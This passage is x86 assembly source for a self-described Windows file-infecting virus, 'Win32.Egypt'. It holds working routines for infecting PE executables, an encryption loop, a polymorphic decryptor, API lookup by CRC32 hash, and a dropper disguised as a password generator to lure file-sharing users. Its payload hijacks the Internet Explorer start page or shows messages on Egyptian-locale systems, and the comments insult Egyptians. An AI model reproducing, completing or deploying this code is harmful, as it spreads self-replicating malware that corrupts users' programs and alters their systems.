eax,[esi+10h] add eax,[esi+0Ch] mov [edi+50h],eax or dword ptr [esi+24h],section_flags mov dword ptr [edi+mark],012345678h lea esi,[ebp+code_start] xchg edi,edx add edi,dword ptr [ebp+MapAddress] mov [ebp+fromhere], edi mov ecx, enc-code_start ; code_len rep movsb no_null_key: call random32 cmp al,0ffh je no_null_key ; Avoid 0 keys cmp ah,068h je no_null_key mov byte ptr[ebp+key2],al xor byte ptr[ebp+key2],0ffh mov bl,al mov byte ptr [ebp+key],ah xor byte ptr [ebp+key],068h mov ecx,enc_end-enc @enc_loop: lodsb sub al,bl neg al ror al,1 not al neg al xor al,ah stosb dec ecx or ecx,ecx jne @enc_loop mov ecx,code_end-enc_end rep movsb pushad mov edi,[ebp+fromhere] add edi,poly_enc-code_start mov ecx,((poly_end-poly_enc)/4)+1 mov eax,dword ptr[ebp+keyy] polyenc_loop: xor dword ptr [edi],eax add edi,4h dec ecx cmp ecx,0h jne polyenc_loop popad mov ecx,[ebp+dec_len] mov esi,[ebp+decplace] rep movsb ; now copy the poly decryptor jmp UnMapFile NoInfect: dec byte ptr [ebp+infections] mov ecx,dword ptr [ebp+wfd.nFileSizeLow] call TruncFile UnMapFile: push dword ptr [ebp+MapAddress] apicall _UnmapViewOfFile CloseMap: push dword ptr [ebp+MapHandle] apicall _CloseHandle CloseFile: mov eax,ebp add eax,offset wfd.ftCreationTime push eax add eax,8 push eax add eax,8 push eax push dword ptr [ebp+FileHandle] apicall _SetFileTime push dword ptr [ebp+FileHandle] apicall _CloseHandle CantOpen: push dword ptr [ebp+wfd.dwFileAttributes] lea eax,[ebp+wfd.cFileName] push eax apicall _SetFileAttributesA ret Align: push edx xor edx,edx push eax div ecx pop eax sub ecx,edx add eax,ecx pop edx ret TruncFile: xor eax,eax push eax push eax push ecx push dword ptr [ebp+FileHandle] apicall _SetFilePointer push dword ptr [ebp+FileHandle] apicall _SetEndOfFile ret OpenFile: xor eax,eax push eax push eax push 00000003h push eax inc eax push eax push 80000000h or 40000000h push edx ;esi apicall _CreateFileA ret CreateMap: xor eax,eax push eax push ecx push eax push 00000004h push eax push dword ptr [ebp+FileHandle] apicall _CreateFileMappingA ret MapFile: xor eax,eax push ecx push eax push eax push 00000002h push dword ptr [ebp+MapHandle] apicall _MapViewOfFile ret ;;;;;;;;;;;;;;;;; ; Get System Time ;;;;;;;;;;;;;;;;; VxGetSystemTime: push ebp mov eax,offset st add eax,ebp push eax call [_GetSystemTime+ebp] pop ebp ret ;;;;;;;;;;;;;;;;;; ; Get ModuleHandle ;;;;;;;;;;;;;;;;;; VxGetModuleHandle: push ebp push eax call [_GetModuleHandleA+ebp] pop ebp ret ;;;;;;;;;;;;;;;;; ; Get ProcAddress ;;;;;;;;;;;;;;;;; VxGetProcAddress: push ebp push edx push eax call [_GetProcAddress+ebp] pop ebp ret payload: call [ebp+_GetSystemDefaultLCID] and eax, 0FFFFh cmp eax, 0c01h ; Arabic (egypt) ? je arabic_payload call VxGetSystemTime cmp word ptr [ebp+wDayOfWeek], 5 ; friday jnz @@Endp cmp word ptr [ebp+wDay], 7 jbe @@DoPayload cmp word ptr [ebp+wDay], 14 jbe @@Endp cmp word ptr [ebp+wDay], 21 ja @@Endp @@DoPayload: lea eax, [ebp+HandleOpenedKey] push eax push 000F003Fh push 0 lea eax, [ebp+IExplorerKey] push eax push HKEY_CURRENT_USER call dword ptr [ebp+_RegOpenKeyExA] or eax, eax jnz @@Endp push pagesize lea eax, [ebp+page] push eax push 1 push 0 lea eax, [ebp+IExplorerValue] push eax push dword ptr [ebp+HandleOpenedKey] call dword ptr [ebp+_RegSetValueExA] push dword ptr [ebp+HandleOpenedKey] call dword ptr [ebp+_RegCloseKey] ; Close key handle @@Endp: ret arabic_payload: mov eax,100 call rndeax cmp eax,3 ; a 4% probability of msg jbe doit ret doit: mov eax,((offset offsets_end-offsets)/4)-1 call rndeax shl eax,2 add eax,ebp add eax,offset offsets push MB_ICONEXCLAMATION mov ebx,ebp add ebx,offset delta push ebx mov eax, dword ptr [eax] add eax,ebp push eax push L 0 call [_MessageBoxA+ebp] ret ;;;;;;;;;;;;;;;;;;;;;;;;; ;Random Number generators ;;;;;;;;;;;;;;;;;;;;;;;;; rndeax: push edx push ecx xor edx,edx push eax call random32 pop ecx div ecx xchg eax, edx pop ecx pop edx ret irandom32: call VxGetSystemTime mov ax,word ptr [st.wMilliseconds +ebp] shl eax,8 mov dword ptr [ebp+lastrnd],eax ret random32: push ecx xor ecx, ecx mov eax, dword ptr [ebp+lastrnd] mov cx, 33 rloop: add eax, eax jnc $+4 xor al, 197 loop rloop mov dword ptr [ebp+lastrnd], eax pop ecx ret lastrnd dd 0h ;;;;;;;;;;;; ; Data stuff ;;;;;;;;;;;; a32_string db "ADVAPI32.dll",0 regopen_string db "RegOpenKeyExA",0 regget_string db "RegQueryValueExA",0 close_string db "RegCloseKey",0 Regset db "RegSetValueExA",0 u32_string db "USER32.dll",0 msgbox_string db "MessageBoxA",0 part2 db "\shell\open\command",0 part2_len equ $-offset part2 prog_itself db "Applications\" prog_buffer db 100h dup (0) desktop db "\Desktop",0 fileee db "BaNGBUS RaNDOM PASSWORD GENERATOR.EXE",0 ; Could you have resisted such a file on kazaa ? ;) avStrings dw 'VA','NA','RD','DI','DO','BT','-F' vStringsCout equ (offset $-offset avStrings)/2 page db 'http://www.touregypt.net',0 ; Yeah , Come and visit egypt, beautiful country with asshole people ;-) pagesize equ $ - offset page IExplorerKey db 'Software\Microsoft\Internet Explorer\Main',0 IExplorerValue db 'Start Page',0 lnk_match db "*.LNK",0 exe_match dd "XE.*" xor "Shit" ; *.EXE db "E",0 kernel32 dd 0BFF70000h @@NamezCRC32 label byte @FindFirstFileA dd 0AE17EBEFh @FindNextFileA dd 0AA700106h @FindClose dd 0C200BE21h @CreateFileA dd 08C892DDFh @DeleteFileA dd 0DE256FDEh @SetFilePointer dd 085859D42h @SetFileAttributesA dd 03C19E536h @CloseHandle dd 068624A9Dh @GetCurrentDirectoryA dd 0EBC6C18Bh @SetCurrentDirectoryA dd 0B2DBD7DCh @GetWindowsDirectoryA dd 0FE248274h @GetSystemDirectoryA dd 0593AE7CEh @CreateFileMappingA dd 096B2D96Ch @MapViewOfFile dd 0797B49ECh @UnmapViewOfFile dd 094524B42h @SetEndOfFile dd 059994ED6h @GetProcAddress dd 0FFC97C1Fh @LoadLibraryA dd 04134D1ADh @GetSystemTime dd 075B7EBE8h @GetModuleHandleA dd 082b618d4h @WriteFile dd 021777793h @GetFileSize dd 0ef7d811bh @GetFileAttributesA dd 0c633d3deh @VirtualAlloc dd 04402890eh @Sleep dd 00ac136bah @CreateThread dd 019f33607h @SetThreadPriority dd 01e533f17h @ResumeThread dd 06087961bh @lstrcmp dd 06ae4253bh @lstrcpy dd 0afd8ae51h @GetSystemDefaultLCID dd 04b410542h @SetFileTime dd 04B2A3E7Dh db 0BBh offsets: dd offset @1 dd offset @2 dd offset @3 dd offset @4 dd offset @5 dd offset @6 dd offset @7 dd offset @8 dd offset @9 dd offset @10 dd offset @11 dd offset @12 dd offset @13 dd offset @14 dd offset @15 dd offset @16 dd offset @17 dd offset @18 dd offset @19 dd offset @20 offsets_end: ; Funny messages in arabic for the arabic payload ; you will not probably find them funny at all but they ; make sense in arabic ;) @1 db "������� �� �� ���� ",0 ; Is he speaking english , Morsi ? @2 db "���� �� ���Ϳ ",0 ; Did you aim at it , smartie ? @3 db "! ��� ��� ���� ����",0 ; It's all because i have a one hair ! @4 db "������ � �� ���� �",0 ; Who is it ? Mr Lotfi?! I can't believe it ! @5 db "! ������ �� ����� ���� ��� ���� � ���� �� ��� �� ���� ���",0 ; Please Tafida, you know that i love you so much, but i don't ; support your mother ! @6 db "� ����� ���� �� ���� � ��� ����� ��� ������",0 ; What's up with you Hamdi ? i already told you i am engaged @7 db "! �� ������ �� ���� ��� �� �����",0 ; Don't Cry your heart out, Tahani ! @8 db "��� ���� ������ ���� ������ �� �� ���",0 ; How do you dare talk to me in such a manner, kid ? @9 db "���� ��� ���� � ������ ��� ������",0 ; String on string and thread on thread @10 db "! ����� �����, ���� ����",0 ; Give me my liberty, free my hands ! @11 db "! � �������",0 ; El-Lembii @12 db "! �� �� ���� , ��� ��� ���",0 ; No Bouha, you can do everything but this ! @13 db "! �� ����� ������ �������",0 ; Oh, you sexy smelling butter boxes ! @14 db "���� ������ ���� ��� ����� �����",0 ; Gamal el dawly calls for resolving the football federation @15 db "���� ������ ���� ������� �������� ������ ������ ",0 ; Gamal el dawly threatens Israel with the nuclear weapon ! @16 db "���� ���� ����� ���� ",0 ; If El ahly is iron, zamalek would melt it ! @17 db "! ����� �� ����, ���� �� ��� �������",0 ; Please mohsen, if daddy finds out about it he will cut us into peaces ! @18 db "! �� ���, �� ����� ���� ���� ��� �������... ��� ��� ������",0 ; Son, it's your time to know the truth, you were born by artificial ; fertilization ! @19 db "� ����� ������ ��� ���� ��� �� ������ �� �",0 ; UGH ! who is knocking in such an hour ? @20 db "! �� ��� ������ ����� ��� ���� ����",0 ; Come on! I told you i am in need of sleep advapi32 dd ? _RegSetValueExA dd ? _RegOpenKeyExA dd ? _RegQueryValueExA dd ? _RegCloseKey dd ? HandleOpenedKey dd 0 val2 db 0,0 buff_ dd 60h buff db 60h dup (0) buff2_ dd 30h buff2 db 30h dup (0) haddress dd ? hmap dd ? hfile dd ? ThreadID3 dd ? olddir db 128 dup (0h) currdir db 128 dup (1h) st SYSTEMTIME ? wfd WIN32_FIND_DATA ? search_handle dd ? search_handle2 dd ? ori_attrib dd ? infect_counter dd ? haddress2 dd ? hmap2 dd ? hfile2 dd ? user32 dd ? _MessageBoxA dd ? itd_va dd ? fsize_high dd ? new_filesize dd ? file_handle dd ? map_handle dd ? map_address dd ? pe_header dd ? last_entry dd ? file_align dd ? tmp_eip dd ? size_rawdata dd ? kernel dd kernel_ infections dd 00000000h NewSize dd 00000000h SearchHandle dd 00000000h FileHandle dd 00000000h MapHandle dd 00000000h MapAddress dd 00000000h AddressTableVA dd 00000000h NameTableVA dd 00000000h OrdinalTableVA dd 00000000h Counter dw 0000h @@Offsetz label byte _FindFirstFileA dd 00000000h _FindNextFileA dd 00000000h _FindClose dd 00000000h _CreateFileA dd 00000000h _DeleteFileA dd 00000000h _SetFilePointer dd 00000000h _SetFileAttributesA dd 00000000h _CloseHandle dd 00000000h _GetCurrentDirectoryA dd 00000000h _SetCurrentDirectoryA dd 00000000h _GetWindowsDirectoryA dd 00000000h _GetSystemDirectoryA dd 00000000h _CreateFileMappingA dd 00000000h _MapViewOfFile dd 00000000h _UnmapViewOfFile dd 00000000h _SetEndOfFile dd 00000000h _GetProcAddress dd 00000000h _LoadLibraryA dd 00000000h _GetSystemTime dd 00000000h _GetModuleHandleA dd 00000000h _WriteFile dd 00000000h _GetFileSize dd 00000000h _GetFileAttributesA dd 00000000h _VirtualAlloc dd 00000000h _Sleep dd 00000000h _CreateThread dd 00000000h _SetThreadPriority dd 00000000h _ResumeThread dd 00000000h _lstrcmp dd 00000000h _lstrcpy dd 00000000h _GetSystemDefaultLCID dd 00000000h _SetFileTime dd 00000000h ; This is a compressed exe file, it will display a faked username ; and password for bangbus when run, included is it's assembly dropstart: db �04Dh, 05Ah, 050h, 000h, 001h, 000h, 002h, 000h db �003h, 000h, 004h, 000h, 001h, 000h, 00Fh, 000h db �001h, 000h, 0FFh, 0FFh, 000h, 002h, 000h, 0B8h db �000h, 007h, 000h, 040h, 000h, 001h, 000h, 01Ah db �000h, 022h, 000h, 001h, 000h, 002h, 000h, 0BAh db �010h, 000h, 001h, 000h, 00Eh, 01Fh, 0B4h, 009h db �0CDh, 021h, 0B8h, 001h, 04Ch, 0CDh, 021h, 090h db �090h, 054h, 068h, 069h, 073h, 020h, 070h, 072h db �06Fh, 067h, 072h, 061h, 06Dh, 020h, 06Dh, 075h db �073h, 074h, 020h, 062h, 065h, 020h, 072h, 075h db �06Eh, 020h, 075h, 06Eh, 064h, 065h, 072h, 020h db �057h, 069h, 06Eh, 033h, 032h, 00Dh, 00Ah, 024h db �037h, 000h, 088h, 000h, 050h, 045h, 000h, 002h db �000h, 04Ch, 001h, 004h, 000h, 001h, 000h, 0F8h db �032h, 078h, 08Dh, 000h, 008h, 000h, 0E0h, 000h db �001h, 000h, 08Eh, 081h, 00Bh, 001h, 002h, 019h db �000h, 001h, 000h, 002h, 000h, 003h, 000h, 006h db �000h, 007h, 000h, 010h, 000h, 003h, 000h, 010h db �000h, 003h, 000h, 020h, 000h, 004h, 000h, 040h db �000h, 002h, 000h, 010h, 000h, 003h, 000h, 002h db �000h, 002h, 000h, 001h, 000h, 007h, 000h, 003h db �000h, 001h, 000h, 00Ah, 000h, 006h, 000h, 050h db �000h, 003h, 000h, 004h, 000h, 006h, 000h, 002h db �000h, 005h, 000h, 010h, 000h, 002h, 000h, 020h db �000h, 004h, 000h, 010h, 000h, 002h, 000h, 010h db �000h, 006h, 000h, 010h, 000h, 00Ch, 000h, 030h db �000h, 002h, 000h, 0ACh, 000h, 01Ch, 000h, 040h db �000h, 002h, 000h, 014h, 000h, 053h, 000h, 043h db �04Fh, 044h, 045h, 000h, 005h, 000h, 010h, 000h db �003h, 000h, 010h, 000h, 003h, 000h, 002h, 000h db �003h, 000h, 006h, 000h, 00Eh, 000h, 020h, 000h db �002h, 000h, 0E0h, 044h, 041h, 054h, 041h, 000h db �005h, 000h, 010h, 000h, 003h, 000h, 020h, 000h db �003h, 000h, 002h, 000h, 003h, 000h, 008h, 000h db �00Eh, 000h, 040h, 000h, 002h, 000h, 0C0h, 02Eh db �069h, 064h, 061h, 074h, 061h, 000h, 003h, 000h db �010h, 000h, 003h, 000h, 030h, 000h, 003h, 000h db �002h, 000h, 003h, 000h, 00Ah, 000h, 00Eh, 000h db �040h, 000h, 002h, 000h, 0C0h, 02Eh, 072h, 065h db �06Ch, 06Fh, 063h, 000h, 003h, 000h, 010h, 000h db �003h, 000h, 040h, 000h, 003h, 000h, 002h, 000h db �003h, 000h, 00Ch, 000h, 00Eh, 000h, 040h, 000h db �002h, 000h, 050h, 000h, 068h, 003h, 06Ah, 030h db �068h, 000h, 001h, 000h, 020h, 040h, 000h, 001h db �000h, 068h, 02Ah, 020h, 040h, 000h, 001h, 000h db �06Ah, 000h, 001h, 000h, 0E8h, 013h, 000h, 003h db �000h, 06Ah, 000h, 001h, 000h, 0E8h, 006h, 000h db �003h, 000h, 0FFh, 025h, 050h, 030h, 040h, 000h db �001h, 000h, 0FFh, 025h, 054h, 030h, 040h, 000h db �001h, 000h, 0FFh, 025h, 05Ch, 030h, 040h, 000h db �0D5h, 001h, 042h, 041h, 04Eh, 047h, 042h, 055h db �053h, 020h, 052h, 041h, 04Eh, 044h, 04Fh, 04Dh db �020h, 050h, 041h, 053h, 053h, 057h, 04Fh, 052h db �044h, 020h, 047h, 045h, 04Eh, 045h, 052h, 041h db �054h, 04Fh, 052h, 020h, 062h, 079h, 020h, 061h db �06Bh, 032h, 038h, 000h, 001h, 000h, 055h, 073h db �065h, 072h, 06Eh, 061h, 06Dh, 065h, 020h, 03Ah db �020h, 06Bh, 06Bh, 06Eh, 06Dh, 079h, 079h, 067h db �040h, 079h, 061h, 068h, 06Fh, 06Fh, 02Eh, 063h db �06Fh, 06Dh, 00Ah, 050h, 061h, 073h, 073h, 077h db �06Fh, 072h, 064h, 020h, 03Ah, 020h, 067h, 06Bh db �034h, 030h, 078h, 078h, 035h, 000h, 0A7h, 001h db �03Ch, 030h, 000h, 00Ah, 000h, 064h, 030h, 000h db �002h, 000h, 050h, 030h, 000h, 002h, 000h, 048h db �030h, 000h, 00Ah, 000h, 071h, 030h, 000h, 002h db �000h, 05Ch, 030h, 000h, 016h, 000h, 07Ch, 030h db �000h, 002h, 000h, 090h, 030h, 000h, 006h, 000h db �09Eh, 030h, 000h, 006h, 000h, 07Ch, 030h, 000h db �002h, 000h, 090h, 030h, 000h, 006h, 000h, 09Eh db �030h, 000h, 006h, 000h, 04Bh, 045h, 052h, 04Eh db �045h, 04Ch, 033h, 032h, 02Eh, 064h, 06Ch, 06Ch db �000h, 001h, 000h, 055h, 053h, 045h, 052h, 033h db �032h, 02Eh, 064h, 06Ch, 06Ch, 000h, 003h, 000h db �047h, 065h, 074h, 04Dh, 06Fh, 064h, 075h, 06Ch db �065h, 048h, 061h, 06Eh, 064h, 06Ch, 065h, 041h db �000h, 004h, 000h, 045h, 078h, 069h, 074h, 050h db �072h, 06Fh, 063h, 065h, 073h, 073h, 000h, 003h db �000h, 04Dh, 065h, 073h, 073h, 061h, 067h, 065h db �042h, 06Fh, 078h, 041h, 000h, 056h, 001h, 010h db �000h, 002h, 000h, 014h, 000h, 003h, 000h, 003h db �030h, 008h, 030h, 01Ch, 030h, 022h, 030h, 028h db �030h, 000h, 0EEh, 003h dropend: enc_end: ;.386p ;.model flat,stdcall ;extrn ExitProcess:proc ;extrn GetModuleHandleA:proc ;extrn MessageBoxA:proc ;.data ;mb_caption db "BANGBUS RANDOM PASSWORD GENERATOR by ak28",0 ;mb_text db "Username : kknmyyg@yahoo.com",10 ; db "Password : gk40xx5",0 ;.code ;start: ; ; push 00000030h ; Display ; push offset mb_caption ; faked msgbox ; push offset mb_text ; push 0 ; call MessageBoxA ; ; push 0 ; End ; call ExitProcess ;end start ;end ; ; 8 Bit decryptor decrypt: pop esi push esi cmp esi,offset enc je nodec xor ecx,ecx mov al,00h key equ $-1 mov ah,00h key2 equ $-1 xor ebx,ebx push dword ptr fs:[ebx] ; Here is the trick , i get the pop ebx ; default SEH address and use xor al,bl ;068h ; it to get the keys to decryption. xor ah,bh ;0ffh dec_loop: xor byte ptr [esi],al ; six 8-bits instructions neg byte ptr [esi] ; on every byte of the not byte ptr [esi] ; virus rol byte ptr [esi],1 neg byte ptr [esi] add byte ptr [esi],ah inc esi inc ecx cmp ecx,enc_end-enc jne dec_loop nodec: ret poly_end: nop nop nop nop code_end: poly_dec: pop eax pushad pushfd push eax ret ;;;;;;;;;;;;;;;; ; Generation one ;;;;;;;;;;;;;;;; g1_quit: push 00000030h push offset mb_caption push offset mb_text push L 0 call MessageBoxA ; Display the message box push L 0 call ExitProcess ; Exit to OS mb_caption db "Win32.Egypt v 1.5 ",0 mb_text db "Win32.Egypt has invaded the system",10 db "This is a 1st generation host",0 ends end code_start